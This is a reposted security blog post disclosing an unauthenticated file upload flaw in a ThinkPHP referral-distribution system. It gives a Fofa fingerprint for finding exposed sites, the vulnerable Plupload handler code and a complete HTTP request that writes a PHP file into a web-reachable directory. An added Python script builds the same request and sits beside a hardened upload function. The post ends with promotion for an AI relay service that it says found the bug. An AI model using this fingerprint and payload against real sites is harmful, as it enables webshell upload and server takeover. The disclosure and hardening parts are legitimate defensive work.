Article summary: the post discloses a high-severity file upload vulnerability in a "self-adaptive task referral distribution system", located at public/static/lib/webuploader/0.1.5/server/fileupload.php. An attacker controls the $_REQUEST['name'] parameter and can upload a malicious PHP file directly, with no authentication and no extension check. The vulnerability was reproduced and a full payload is included; the author stresses that the hunt was automated with AI tooling and recommends that developers harden their upload validation. Overall score: 81. Categories: vulnerability analysis, code audit, web security, penetration testing, security tools.
A self-adaptive task referral distribution system has a file upload vulnerability
Original
XingYue404
XingYue Security (星悦安全)
June 8, 2026, 15:23, Zhejiang
0x00 Preface
Nothing technically demanding here: the whole audit was done by AI end to end, with no special prompt. The same AI audit setup is described at the end of the post.
Vendor description of the product: matrix-style fission profit-sharing logic. The system's core uses a three-tier "general agent - service provider - employee" management model. General agents and service providers can set a 0-10% profit margin for their downlines precisely, with one-click price changes reflected on the front end in real time. This "unlimited fission" mechanism, combined with the general agent's exclusive 0.5 yuan per-order team bonus, is meant to activate ground promotion teams quickly and drive exponential growth through incentives.
Fofa fingerprint: "/static/home/login/reset.css"
Framework: ThinkPHP
0x01 Vulnerability analysis & reproduction
The handler at public/static/lib/webuploader/0.1.5/server/fileupload.php is the Plupload example upload.php bundled under the WebUploader 0.1.5 directory. It takes the destination file name from $_REQUEST["name"], and no authentication, CSRF check, extension allow-list or MIME check was found. As the code below shows, the name is concatenated into $uploadDir without basename(), the body is read either from the multipart "file" part or, when there is no multipart part at all, straight from php://input, and with chunks=1 the single chunk is assembled into upload/<name> in the same request. A request with name=audit.php and a PHP body therefore writes audit.php into a web-reachable directory.
```php
<?php
/**
 * upload.php
 *
 * Copyright 2013, Moxiecode Systems AB
 * Released under GPL License.
 *
 * License: http://www.plupload.com/license
 * Contributing: http://www.plupload.com/contributing
 */

#!! IMPORTANT:
#!! this file is just an example, it doesn't incorporate any security checks and
#!! is not recommended to be used in production environment as it is. Be sure to
#!! revise it and customize to your needs.

// Make sure file is not cached (as it happens for example on iOS devices)
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

// Support CORS
// header("Access-Control-Allow-Origin: *");
// other CORS headers if any...
if ($_SERVER['REQUEST_METHOD'] == 'OPTIONS') {
    exit; // finish preflight CORS requests here
}

if ( !empty($_REQUEST[ 'debug' ]) ) {
    $random = rand(0, intval($_REQUEST[ 'debug' ]) );
    if ( $random === 0 ) {
        header("HTTP/1.0 500 Internal Server Error");
        exit;
    }
}

// header("HTTP/1.0 500 Internal Server Error");
// exit;

// 5 minutes execution time
@set_time_limit(5 * 60);

// Uncomment this one to fake upload time
// usleep(5000);

// Settings
// $targetDir = ini_get("upload_tmp_dir") . DIRECTORY_SEPARATOR . "plupload";
$targetDir = 'upload_tmp';
$uploadDir = 'upload';

$cleanupTargetDir = true; // Remove old files
$maxFileAge = 5 * 3600; // Temp file age in seconds

// Create target dir
if (!file_exists($targetDir)) {
    @mkdir($targetDir);
}

// Create target dir
if (!file_exists($uploadDir)) {
    @mkdir($uploadDir);
}

// Get a file name
if (isset($_REQUEST["name"])) {
    $fileName = $_REQUEST["name"];
} elseif (!empty($_FILES)) {
    $fileName = $_FILES["file"]["name"];
} else {
    $fileName = uniqid("file_");
}

$filePath = $targetDir . DIRECTORY_SEPARATOR . $fileName;
$uploadPath = $uploadDir . DIRECTORY_SEPARATOR . $fileName;

// Chunking might be enabled
$chunk = isset($_REQUEST["chunk"]) ? intval($_REQUEST["chunk"]) : 0;
$chunks = isset($_REQUEST["chunks"]) ? intval($_REQUEST["chunks"]) : 1;

// Remove old temp files
if ($cleanupTargetDir) {
    if (!is_dir($targetDir) || !$dir = opendir($targetDir)) {
        die('{"jsonrpc" : "2.0", "error" : {"code": 100, "message": "Failed to open temp directory."}, "id" : "id"}');
    }

    while (($file = readdir($dir)) !== false) {
        $tmpfilePath = $targetDir . DIRECTORY_SEPARATOR . $file;

        // If temp file is current file proceed to the next
        if ($tmpfilePath == "{$filePath}_{$chunk}.part" || $tmpfilePath == "{$filePath}_{$chunk}.parttmp") {
            continue;
        }

        // Remove temp file if it is older than the max age and is not the current file
        if (preg_match('/\.(part|parttmp)$/', $file) && (@filemtime($tmpfilePath) < time() - $maxFileAge)) {
            @unlink($tmpfilePath);
        }
    }
    closedir($dir);
}

// Open temp file
if (!$out = @fopen("{$filePath}_{$chunk}.parttmp", "wb")) {
    die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}');
}

if (!empty($_FILES)) {
    if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
        die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."}, "id" : "id"}');
    }

    // Read binary input stream and append it to temp file
    if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
        die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
    }
} else {
    if (!$in = @fopen("php://input", "rb")) {
        die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
    }
}

while ($buff = fread($in, 4096)) {
    fwrite($out, $buff);
}

@fclose($out);
@fclose($in);

rename("{$filePath}_{$chunk}.parttmp", "{$filePath}_{$chunk}.part");

$index = 0;
$done = true;
for( $index = 0; $index < $chunks; $index++ ) {
    if ( !file_exists("{$filePath}_{$index}.part") ) {
        $done = false;
        break;
    }
}
if ( $done ) {
    if (!$out = @fopen($uploadPath, "wb")) {
        die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}');
    }

    if ( flock($out, LOCK_EX) ) {
        for( $index = 0; $index < $chunks; $index++ ) {
            if (!$in = @fopen("{$filePath}_{$index}.part", "rb")) {
                break;
            }

            while ($buff = fread($in, 4096)) {
                fwrite($out, $buff);
            }

            @fclose($in);
            @unlink("{$filePath}_{$index}.part");
        }

        flock($out, LOCK_UN);
    }
    @fclose($out);
}

// Return Success JSON-RPC response
die('{"jsonrpc" : "2.0", "result" : null, "id" : "id"}');
```
Payload (the boundary declared in Content-Type must be the same one used in the body, and Content-Length of 197 is for exactly this body with CRLF line endings):

```http
POST /static/lib/webuploader/0.1.5/server/fileupload.php?name=audit.php&chunk=0&chunks=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytWIvtdAsZeAHIKQN
Host: 192.168.140.128
Origin: http://192.168.140.128
Referer: http://192.168.140.128/static/lib/webuploader/0.1.5/server/fileupload.php?name=audit.php&chunk=0&chunks=1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36

------WebKitFormBoundarytWIvtdAsZeAHIKQN
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundarytWIvtdAsZeAHIKQN--
```

The multipart filename (1.php) is irrelevant here: the handler prefers the name query parameter, so the file lands under the name given there.
The file is written to /static/lib/webuploader/0.1.5/server/upload/audit.php and can then be requested directly.
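The following script is an added example, not code from the post, from WebUploader/Plupload or from the affected product. It models the file-name selection of the handler above next to a hardened version (caller-supplied name ignored, extension allow-list, server-generated storage name), and it builds the PoC request programmatically so that the boundary in Content-Type always matches the body and Content-Length is exact. The endpoint path, the name/chunk/chunks parameters, the request body and the lab address 192.168.140.128 come from the post; the function names, the allow-list and the random-name scheme are this example's own assumptions. Nothing is sent unless you pass the returned request to urlopen yourself.

```python
"""Model of the WebUploader/Plupload example handler's file-name logic, a
hardened counterpart, and a builder for the PoC request.

Added example; not code from the post or from the affected product. Only the
endpoint path, the name/chunk/chunks parameters and the request body are taken
from the post. Function names, ALLOWED_EXT and the random storage name are
assumptions made here.
"""
import posixpath
import secrets
import urllib.request

UPLOAD_DIR = "upload"
TARGET_PATH = "/static/lib/webuploader/0.1.5/server/fileupload.php"
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}  # assumed image allow-list


def vulnerable_upload_path(request: dict, files: dict) -> str:
    """Same selection order as the PHP handler: $_REQUEST['name'] beats the
    multipart filename, and the value is joined to the upload dir unchanged,
    so neither the extension nor a '../' prefix is ever checked."""
    if "name" in request:
        name = request["name"]
    elif files:
        name = files["file"]["name"]
    else:
        name = "file_" + secrets.token_hex(6)  # stands in for uniqid("file_")
    return UPLOAD_DIR + "/" + name


def hardened_upload_path(request: dict, files: dict) -> str:
    """Hardened counterpart: the caller-supplied name is ignored, only the
    extension of the multipart filename is kept, it must be on the allow-list,
    and the file is stored under a server-generated random name."""
    if "file" not in files:
        raise ValueError("no file part")
    original = posixpath.basename(files["file"]["name"].replace("\\", "/"))
    ext = original.rsplit(".", 1)[-1].lower() if "." in original else ""
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension {ext!r} not allowed")
    return f"{UPLOAD_DIR}/{secrets.token_hex(16)}.{ext}"


def build_multipart(filename: str, content: bytes, content_type: str, boundary: str):
    """Build a single-part multipart/form-data body with browser-style CRLF
    line endings and a closing boundary. Returns (headers, body); the boundary
    in Content-Type is the one used in the body and Content-Length is exact."""
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode() + content + f"\r\n--{boundary}--\r\n".encode()
    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
    }
    return headers, body


def poc_request(host: str, name: str = "audit.php",
                boundary: str = "----WebKitFormBoundarytWIvtdAsZeAHIKQN") -> urllib.request.Request:
    """The request from the post, built instead of hand-edited. It is only
    constructed here; sending it is left to the caller."""
    url = f"http://{host}{TARGET_PATH}?name={name}&chunk=0&chunks=1"
    headers, body = build_multipart("1.php", b"<?php phpinfo();?>", "image/jpeg", boundary)
    return urllib.request.Request(url, data=body, headers=headers, method="POST")


if __name__ == "__main__":
    req = poc_request("192.168.140.128")  # lab host from the post; nothing is sent
    print(req.get_method(), req.full_url)
    print(req.get_header("Content-length"), "body bytes")
    params = {"name": "audit.php", "chunk": "0", "chunks": "1"}
    files = {"file": {"name": "1.php"}}
    print("original handler writes:", vulnerable_upload_path(params, files))
    try:
        hardened_upload_path(params, files)
    except ValueError as exc:
        print("hardened handler rejects:", exc)
    print("hardened handler stores ../../cat.png as:",
          hardened_upload_path(params, {"file": {"name": "../../cat.png"}}))
```

Running the script prints the request line, the 197-byte body length from the post, the path the original handler would write (upload/audit.php) and the rejection from the hardened variant. The hardened function deliberately never reads request["name"]: the only safe use of a client-chosen name is as display metadata, not as a path component.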
0x04 Vulnerability hunting
Tags: code audit, 0day, penetration testing, system, generic, Xianyu, exchange
This vulnerability was found entirely by GPT5.5, accessed through the XingYue AI relay.
Today, June 8, all GPT models are free all day: use xhigh as much as you like, with no rate limit.
https://www.xyusec.com/
DeepSeek-v4-flash DeepSeek-v4-Pro
Glm-5 Glm-5.1 kimi-k2.5 miniMax-M2.5 Qwen3-235B-A22B Qwen3.5-397B-A17B
All of the above models are free to use, and you can join the group to claim $5 in credit.
Disclaimer: the programs and methods described in this article may be offensive in nature and are provided solely for security research and education. Readers who use this information for any other purpose bear full legal and joint liability; the author and this public account accept no legal or joint liability.
Reposted from XingYue Security (星悦安全), XingYue404: "A self-adaptive task referral distribution system has a file upload vulnerability".